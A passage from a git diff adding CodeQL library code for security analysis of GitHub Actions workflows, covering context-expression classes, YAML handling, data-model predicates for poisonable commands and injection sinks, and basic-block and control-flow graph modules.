exists(getAJsonReferenceExpression(this.getFullExpression(), _)) + } + + override string getExpression() { + ( + result = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + result = this.getFullExpression() + ) + } + + abstract string getFieldName(); + + abstract AstNodeImpl getTarget(); + + override string toString() { result = this.getFullExpression() } +} + +class JsonReferenceExpressionImpl extends ExpressionImpl { + string innerExpression; + string accessPath; + + JsonReferenceExpressionImpl() { + innerExpression = getAJsonReferenceExpression(this.getExpression(), _) and + accessPath = getAJsonReferenceAccessPath(this.getExpression(), _) + } + + string getInnerExpression() { result = innerExpression } + + string getAccessPath() { result = accessPath } +} + +private string stepsCtxRegex() { + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string needsCtxRegex() { + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string jobsCtxRegex() { + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.(.+)") } + +private string inputsCtxRegex() { + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } + +private string githubCtxRegex() { + result = wrapRegexp("github\\.([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)") +} + +/** + * Holds for an expression accesing the `github` context. + * e.g. `${{ github.head_ref }}` + */ +class GitHubExpressionImpl extends SimpleReferenceExpressionImpl { + GitHubExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(githubCtxRegex()) + ) + } + + override string getFieldName() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + result = expr.regexpCapture(githubCtxRegex(), 1) + ) + } + + override AstNodeImpl getTarget() { none() } +} + +/** + * Holds for an expression accesing the `secrets` context. + * e.g. `${{ secrets.FOO }}` + */ +class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + SecretsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(secretsCtxRegex()) and + fieldName = expr.regexpCapture(secretsCtxRegex(), 1) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { none() } +} + +/** + * Holds for an expression accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepsExpressionImpl extends SimpleReferenceExpressionImpl { + string stepId; + string fieldName; + + StepsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + ( + this.getEnclosingJob() = result.getEnclosingJob() + or + exists(CompositeActionImpl a | + a.getAChildNode*() = this and + a.getAChildNode*() = result + ) + ) and + result.(StepImpl).getId() = stepId + } + + string getStepId() { result = stepId } +} + +/** + * Holds for an expression accesing the `needs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` + */ +class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { + JobImpl neededJob; + string fieldName; + + NeedsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(needsCtxRegex()) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expr.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + ) + } + + string getNeededJobId() { result = neededJob.getId() } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + ( + this.getEnclosingJob().getANeededJob() = neededJob or + this.getEnclosingJob() = neededJob + ) and + ( + // regular jobs + neededJob.getOutputs() = result + or + // reusable workflow calling jobs + neededJob.(ExternalJobImpl) = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) + */ +class JobsExpressionImpl extends SimpleReferenceExpressionImpl { + string jobId; + string fieldName; + + JobsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(JobImpl job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getOutputs() = result + ) + } +} + +/** + * Holds for an expression the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` + */ +class InputsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + InputsExpressionImpl() { + normalizeExpr(this.getExpression()).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(this.getExpression()).regexpCapture(inputsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + result.getLocation().getFile() = this.getLocation().getFile() and + ( + exists(ReusableWorkflowImpl w | w.getInput(fieldName) = result) + or + exists(CompositeActionImpl a | a.getInput(fieldName) = result) + ) + } +} + +/** + * Holds for an expression accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + EnvExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(AstNodeImpl s | + s.getInScopeEnvVarExpr(fieldName) = result and + s.getAChildNode*() = this + ) + or + // Some Run steps may store taint in the enclosing job so we need to check the enclosing job + result = this.getEnclosingJob() + } +} + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldAccess; + + MatrixExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(matrixCtxRegex()) and + fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) + ) + } + + override string getFieldName() { result = fieldAccess } + + override AstNodeImpl getTarget() { + result = this.getEnclosingWorkflow().getStrategy().getMatrixVarExpr(fieldAccess) or + result = this.getEnclosingJob().getStrategy().getMatrixVarExpr(fieldAccess) + } + + string getLiteralValues() { + exists(StrategyImpl s, MatrixAccessPathImpl p, ScalarValueImpl v | + (s = this.getEnclosingJob().getStrategy() or s = this.getEnclosingWorkflow().getStrategy()) and + p.toString() = fieldAccess and + resolveMatrixAccessPath(s.getMatrix(), p).getNode(_) = v.getNode() and + // Exclude values containing matrix expressions to avoid recursion + not exists(MatrixExpressionImpl e | e.getParentNode() = v) and + result = v.getValue() + ) + } +} + +bindingset[accessPath] +string explodeAccessPath(string accessPath) { + result = accessPath or + result = accessPath.suffix(accessPath.indexOf(".") + 1) or + result = accessPath.prefix(accessPath.indexOf(".")) +} + +private newtype TAccessPath = + TMatrixAccessPathNode(string accessPath) { + exists(MatrixExpressionImpl e | accessPath = explodeAccessPath(e.getFieldName())) + } + +class MatrixAccessPathImpl extends TMatrixAccessPathNode { + string accessPath; + + MatrixAccessPathImpl() { this = TMatrixAccessPathNode(accessPath) } + + string toString() { result = accessPath } +} + +private YamlMappingLikeNode resolveMatrixAccessPath( + // TODO: support `include` and `exclude` keys + // https://docs.github.com/en/actions/using-jobs/using-a-matrix-for-your-jobs#expanding-or-adding-matrix-configurations + YamlMappingLikeNode root, MatrixAccessPathImpl accessPath +) { + // access path contains no dots. eg: "os" + result = root.getNode(accessPath.toString()) + or + // access path contains dots. eg: "plaform.os" + exists(MatrixAccessPathImpl first, MatrixAccessPathImpl rest, YamlMappingLikeNode newRoot | + first.toString() = accessPath.toString().splitAt(".", 0) and + rest.toString() = accessPath.toString().suffix(first.toString().length() + 1) and + newRoot = root.getNode(first.toString()) and + if newRoot instanceof YamlSequence + then result = resolveMatrixAccessPath(newRoot.(YamlSequence).getElementNode(_), rest) + else result = resolveMatrixAccessPath(newRoot, rest) + ) +} diff --git a/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll b/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll new file mode 100644 index 000000000000..49b83df48db5 --- /dev/null +++ b/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll @@ -0,0 +1,57 @@ +/** + * Provides classes for working with YAML data. + * + * YAML documents are represented as abstract syntax trees whose nodes + * are either YAML values or alias nodes referring to another YAML value. + */ + +private import codeql.yaml.Yaml as LibYaml + +private module YamlSig implements LibYaml::InputSig { + import codeql.Locations + + class LocatableBase extends @yaml_locatable { + Location getLocation() { + exists(@location_default loc, File f, string p, int sl, int sc, int el, int ec | + f.getAbsolutePath() = p and + locations_default(loc, f, sl, sc, el, ec) and + yaml_locations(this, loc) and + result = TBaseLocation(p, sl, sc, el, ec) + ) + } + + string toString() { none() } + } + + class NodeBase extends LocatableBase, @yaml_node { + NodeBase getChildNode(int i) { yaml(result, _, this, i, _, _) } + + string getTag() { yaml(this, _, _, _, result, _) } + + string getAnchor() { yaml_anchors(this, result) } + + override string toString() { yaml(this, _, _, _, _, result) } + } + + class ScalarNodeBase extends NodeBase, @yaml_scalar_node { + int getStyle() { yaml_scalars(this, result, _) } + + string getValue() { yaml_scalars(this, _, result) } + } + + class CollectionNodeBase extends NodeBase, @yaml_collection_node { } + + class MappingNodeBase extends CollectionNodeBase, @yaml_mapping_node { } + + class SequenceNodeBase extends CollectionNodeBase, @yaml_sequence_node { } + + class AliasNodeBase extends NodeBase, @yaml_alias_node { + string getTarget() { yaml_aliases(this, result) } + } + + class ParseErrorBase extends LocatableBase, @yaml_error { + string getMessage() { yaml_errors(this, result) } + } +} + +import LibYaml::Make diff --git a/actions/ql/lib/codeql/actions/config/Config.qll b/actions/ql/lib/codeql/actions/config/Config.qll new file mode 100644 index 000000000000..265d4bd820f8 --- /dev/null +++ b/actions/ql/lib/codeql/actions/config/Config.qll @@ -0,0 +1,147 @@ +import ConfigExtensions as Extensions + +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ +predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +) { + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { + Extensions::repositoryDataModel(visibility, default_branch_name) +} + +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + +private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } + +/** + * MaD models for poisonable commands + * Fields: + * - regexp: Regular expression for matching poisonable commands + */ +predicate poisonableCommandsDataModel(string regexp) { + exists(string sub_regexp | + Extensions::poisonableCommandsDataModel(sub_regexp) and + regexp = commandLauncher() + sub_regexp + ".*" + ) +} + +/** + * MaD models for poisonable local scripts + * Fields: + * - regexp: Regular expression for matching poisonable local scripts + * - group: Script capture group number for the regular expression + */ +predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { + exists(string sub_regexp | + Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and + regexp = commandLauncher() + sub_regexp + ".*" + ) +} + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + regexp = commandLauncher() + sub_regexp + ) +} + +/** + * MaD models for poisonable actions + * Fields: + * - action: action name + */ +predicate poisonableActionsDataModel(string action) { + Extensions::poisonableActionsDataModel(action) +} + +/** + * MaD models for event properties that can be user-controlled. + * Fields: + * - property: event property + * - kind: property kind + */ +predicate untrustedEventPropertiesDataModel(string property, string kind) { + Extensions::untrustedEventPropertiesDataModel(property, kind) +} + +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + * - vulnerable_version: vulnerable version + * - vulnerable_sha: vulnerable sha + * - fixed_version: fixed version + */ +predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +) { + Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) +} + +/** + * MaD models for immutable actions + * Fields: + * - action: action name + */ +predicate immutableActionsDataModel(string action) { Extensions::immutableActionsDataModel(action) } + +/** + * MaD models for untrusted git commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted git commands + * - flag: Flag for the command + */ +predicate untrustedGitCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGitCommandDataModel(cmd_regex, flag) +} + +/** + * MaD models for untrusted gh commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted gh commands + * - flag: Flag for the command + */ +predicate untrustedGhCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGhCommandDataModel(cmd_regex, flag) +} diff --git a/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll new file mode 100644 index 000000000000..99ad7eb8df1b --- /dev/null +++ b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -0,0 +1,74 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if workflow data model exists for the given parameters. + */ +extensible predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +); + +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if a context expression starting with context_prefix is available for a given trigger. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); + +/** + * Holds for strings that match poisonable commands. + */ +extensible predicate poisonableCommandsDataModel(string regexp); + +/** + * Holds for strings that match poisonable local scripts. + */ +extensible predicate poisonableLocalScriptsDataModel(string regexp, int group); + +/** + * Holds for actions that can be poisoned through local files. + */ +extensible predicate poisonableActionsDataModel(string action); + +/** + * Holds for event properties that can be user-controlled. + */ +extensible predicate untrustedEventPropertiesDataModel(string property, string kind); + +/** + * Holds for arguments to commands that execute the given argument + */ +extensible predicate argumentInjectionSinksDataModel( + string regexp, int command_group, int argument_group +); + +/** + * Holds for actions that are known to be vulnerable. + */ +extensible predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +); + +/** + * Holds for actions that are known to be immutable. + */ +extensible predicate immutableActionsDataModel(string action); + +/** + * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. + */ +extensible predicate untrustedGitCommandDataModel(string cmd_regex, string flag); + +/** + * Holds for gh commands that may introduce untrusted data + */ +extensible predicate untrustedGhCommandDataModel(string cmd_regex, string flag); diff --git a/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll new file mode 100644 index 000000000000..af5e0f62552f --- /dev/null +++ b/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll @@ -0,0 +1,444 @@ +/** Provides classes representing basic blocks. */ + +private import codeql.actions.Cfg +private import codeql.actions.Ast +private import codeql.Locations + +/** + * A basic block, that is, a maximal straight-line sequence of control flow nodes + * without branches or joins. + */ +class BasicBlock extends TBasicBlockStart { + /** Gets the scope of this basic block. */ + final CfgScope getScope() { result = this.getFirstNode().getScope() } + + /** Gets an immediate successor of this basic block, if any. */ + BasicBlock getASuccessor() { result = this.getASuccessor(_) } + + /** Gets an immediate successor of this basic block of a given type, if any. */ + BasicBlock getASuccessor(SuccessorType t) { + result.getFirstNode() = this.getLastNode().getASuccessor(t) + } + + /** Gets an immediate predecessor of this basic block, if any. */ + BasicBlock getAPredecessor() { result.getASuccessor() = this } + + /** Gets an immediate predecessor of this basic block of a given type, if any. */ + BasicBlock getAPredecessor(SuccessorType t) { result.getASuccessor(t) = this } + + /** Gets the control flow node at a specific (zero-indexed) position in this basic block. */ + Node getNode(int pos) { bbIndex(this.getFirstNode(), result, pos) } + + /** Gets a control flow node in this basic block. */ + Node getANode() { result = this.getNode(_) } + + /** Gets the first control flow node in this basic block. */ + Node getFirstNode() { this = TBasicBlockStart(result) } + + /** Gets the last control flow node in this basic block. */ + Node getLastNode() { result = this.getNode(this.length() - 1) } + + /** Gets the length of this basic block. */ + int length() { result = strictcount(this.getANode()) } + + /** + * Holds if this basic block immediately dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which is an immediate + * predecessor of `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 immediately dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate immediatelyDominates(BasicBlock bb) { bbIDominates(this, bb) } + + /** + * Holds if this basic block strictly dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 strictly dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate strictlyDominates(BasicBlock bb) { bbIDominates+(this, bb) } + + /** + * Holds if this basic block dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 dominates the basic + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate dominates(BasicBlock bb) { + bb = this or + this.strictlyDominates(bb) + } + + /** + * Holds if `df` is in the dominance frontier of this basic block. + * That is, this basic block dominates a predecessor of `df`, but + * does not dominate `df` itself. + * + * Example: + * + * ```rb + * def m x + * if x < 0 + * x = -x + * if x > 10 + * x = x - 1 + * end + * end + * puts x + * end + * ``` + * + * The basic block on line 8 is in the dominance frontier + * of the basic block starting on line 3 because that block + * dominates the basic block on line 4, which is a predecessor of + * `puts x`. Also, the basic block starting on line 3 does not + * dominate the basic block on line 8. + */ + predicate inDominanceFrontier(BasicBlock df) { + this.dominatesPredecessor(df) and + not this.strictlyDominates(df) + } + + /** + * Holds if this basic block dominates a predecessor of `df`. + */ + private predicate dominatesPredecessor(BasicBlock df) { this.dominates(df.getAPredecessor()) } + + /** + * Gets the basic block that immediately dominates this basic block, if any. + * + * That is, all paths reaching this basic block from some entry point + * basic block must go through the result, which is an immediate basic block + * predecessor of this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 is an immediate dominator of + * the basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block, and the `if` block + * is an immediate predecessor of `return 1`). + */ + BasicBlock getImmediateDominator() { bbIDominates(result, this) } + + /** + * Holds if this basic block strictly post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 strictly post-dominates the basic block on + * line 3 (all paths to the exit point of `m` from `puts "b"` must go + * through `puts "m"`). + */ + predicate strictlyPostDominates(BasicBlock bb) { bbIPostDominates+(this, bb) } + + /** + * Holds if this basic block post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 post-dominates the basic block on line 3 + * (all paths to the exit point of `m` from `puts "b"` must go through + * `puts "m"`). + */ + predicate postDominates(BasicBlock bb) { + this.strictlyPostDominates(bb) or + this = bb + } + + /** Holds if this basic block is in a loop in the control flow graph. */ + predicate inLoop() { this.getASuccessor+() = this } + + /** Gets a textual representation of this basic block. */ + string toString() { result = this.getFirstNode().toString() } + + /** Gets the location of this basic block. */ + Location getLocation() { result = this.getFirstNode().getLocation() } +} + +cached +private module Cached { + /** Internal representation of basic blocks. */ + cached + newtype TBasicBlock = TBasicBlockStart(Node cfn) { startsBB(cfn) } + + /** Holds if `cfn` starts a new basic block. */ + private predicate startsBB(Node cfn) { + not exists(cfn.getAPredecessor()) and exists(cfn.getASuccessor()) + or + cfn.isJoin() + or + cfn.getAPredecessor().isBranch() + or + /* + * In cases such as + * + * ```rb + * if x or y + * foo + * else + * bar + * ``` + * + * we have a CFG that looks like + * + * x --false--> [false] x or y --false--> bar + * \ | + * --true--> y --false-- + * \ + * --true--> [true] x or y --true--> foo + * + * and we want to ensure that both `foo` and `bar` start a new basic block, + * in order to get a `ConditionalBlock` out of the disjunction. + */ + + exists(cfn.getAPredecessor(any(BooleanSuccessor s))) + } + + /** + * Holds if `succ` is a control flow successor of `pred` within + * the same basic block. + */ + private predicate intraBBSucc(Node pred, Node succ) { + succ = pred.getASuccessor() and + not startsBB(succ) + } + + /** + * Holds if `cfn` is the `i`th node in basic block `bb`. + * + * In other words, `i` is the shortest distance from a node `bb` + * that starts a basic block to `cfn` along the `intraBBSucc` relation. + */ + cached + predicate bbIndex(Node bbStart, Node cfn, int i) = + shortestDistances(startsBB/1, intraBBSucc/2)(bbStart, cfn, i) + + /** + * Holds if the first node of basic block `succ` is a control flow + * successor of the last node of basic block `pred`. + */ + private predicate succBB(BasicBlock pred, BasicBlock succ) { succ = pred.getASuccessor() } + + /** Holds if `dom` is an immediate dominator of `bb`. */ + cached + predicate bbIDominates(BasicBlock dom, BasicBlock bb) = + idominance(entryBB/1, succBB/2)(_, dom, bb) + + /** Holds if `pred` is a basic block predecessor of `succ`. */ + private predicate predBB(BasicBlock succ, BasicBlock pred) { succBB(pred, succ) } + + /** Holds if `bb` is an exit basic block that represents normal exit. */ + private predicate normalExitBB(BasicBlock bb) { bb.getANode().(AnnotatedExitNode).isNormal() } + + /** Holds if `dom` is an immediate post-dominator of `bb`. */ + cached + predicate bbIPostDominates(BasicBlock dom, BasicBlock bb) = + idominance(normalExitBB/1, predBB/2)(_, dom, bb) + + /** + * Gets the `i`th predecessor of join block `jb`, with respect to some + * arbitrary order. + */ + cached + JoinBlockPredecessor getJoinBlockPredecessor(JoinBlock jb, int i) { + none() + /* + * result = + * rank[i + 1](JoinBlockPredecessor jbp | + * jbp = jb.getAPredecessor() + * | + * jbp order by JoinBlockPredecessors::getId(jbp), JoinBlockPredecessors::getSplitString(jbp) + * ) + */ + + } + + cached + predicate immediatelyControls(ConditionBlock cb, BasicBlock succ, BooleanSuccessor s) { + succ = cb.getASuccessor(s) and + forall(BasicBlock pred | pred = succ.getAPredecessor() and pred != cb | succ.dominates(pred)) + } + + cached + predicate controls(ConditionBlock cb, BasicBlock controlled, BooleanSuccessor s) { + exists(BasicBlock succ | cb.immediatelyControls(succ, s) | succ.dominates(controlled)) + } +} + +private import Cached + +/** Holds if `bb` is an entry basic block. */ +private predicate entryBB(BasicBlock bb) { bb.getFirstNode() instanceof EntryNode } + +/** + * An entry basic block, that is, a basic block whose first node is + * an entry node. + */ +class EntryBasicBlock extends BasicBlock { + EntryBasicBlock() { entryBB(this) } +} + +/** + * An annotated exit basic block, that is, a basic block whose last node is + * an annotated exit node. + */ +class AnnotatedExitBasicBlock extends BasicBlock { + private boolean normal; + + AnnotatedExitBasicBlock() { + exists(AnnotatedExitNode n | + n = this.getANode() and + if n.isNormal() then normal = true else normal = false + ) + } + + /** Holds if this block represent a normal exit. */ + final predicate isNormal() { normal = true } +} + +/** + * An exit basic block, that is, a basic block whose last node is + * an exit node. + */ +class ExitBasicBlock extends BasicBlock { + ExitBasicBlock() { this.getLastNode() instanceof ExitNode } +} + +/* + * private module JoinBlockPredecessors { + * private predicate id(AstNode x, AstNode y) { x = y } + * + * private predicate idOf(AstNode x, int y) = equivalenceRelation(id/2)(x, y) + * + * int getId(JoinBlockPredecessor jbp) { + * idOf(Ast::toTreeSitter(jbp.getFirstNode().(AstCfgNode).getAstNode()), result) + * or + * idOf(Ast::toTreeSitter(jbp.(EntryBasicBlock).getScope()), result) + * } + * + * string getSplitString(JoinBlockPredecessor jbp) { + * result = jbp.getFirstNode().(AstCfgNode).getSplitsString() + * or + * not exists(jbp.getFirstNode().(AstCfgNode).getSplitsString()) and + * result = "" + * } + * } + */ + +/** A basic block with more than one predecessor. */ +class JoinBlock extends BasicBlock { + JoinBlock() { this.getFirstNode().isJoin() } + + /** + * Gets the `i`th predecessor of this join block, with respect to some + * arbitrary order. + */ + JoinBlockPredecessor getJoinBlockPredecessor(int i) { result = getJoinBlockPredecessor(this, i) } +} + +/** A basic block that is an immediate predecessor of a join block. */ +class JoinBlockPredecessor extends BasicBlock { + JoinBlockPredecessor() { this.getASuccessor() instanceof JoinBlock } +} + +/** A basic block that terminates in a condition, splitting the subsequent control flow. */ +class ConditionBlock extends BasicBlock { + ConditionBlock() { this.getLastNode().isCondition() } + + /** + * Holds if basic block `succ` is immediately controlled by this basic + * block with conditional value `s`. That is, `succ` is an immediate + * successor of this block, and `succ` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate immediatelyControls(BasicBlock succ, BooleanSuccessor s) { + immediatelyControls(this, succ, s) + } + + /** + * Holds if basic block `controlled` is controlled by this basic block with + * conditional value `s`. That is, `controlled` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } +} diff --git a/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll new file mode 100644 index 000000000000..318cd2820a35 --- /dev/null +++ b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -0,0 +1,316 @@ +private import codeql.actions.Ast +private import codeql.controlflow.Cfg as CfgShared +private import codeql.Locations + +module Completion { + private newtype TCompletion = + TSimpleCompletion() or + TBooleanCompletion(boolean b) { b in [false, true] } or + TReturnCompletion() + + abstract class Completion extends TCompletion { + abstract string toString(); + + predicate isValidForSpecific(AstNode e) { none() } + + predicate isValidFor(AstNode e) { this.isValidForSpecific(e) } + + abstract SuccessorType getAMatchingSuccessorType(); + } + + abstract class NormalCompletion extends Completion { } + + class SimpleCompletion extends NormalCompletion, TSimpleCompletion { + override string toString() { result = "SimpleCompletion" } + + override predicate isValidFor(AstNode e) { not any(Completion c).isValidForSpecific(e) } + + override NormalSuccessor 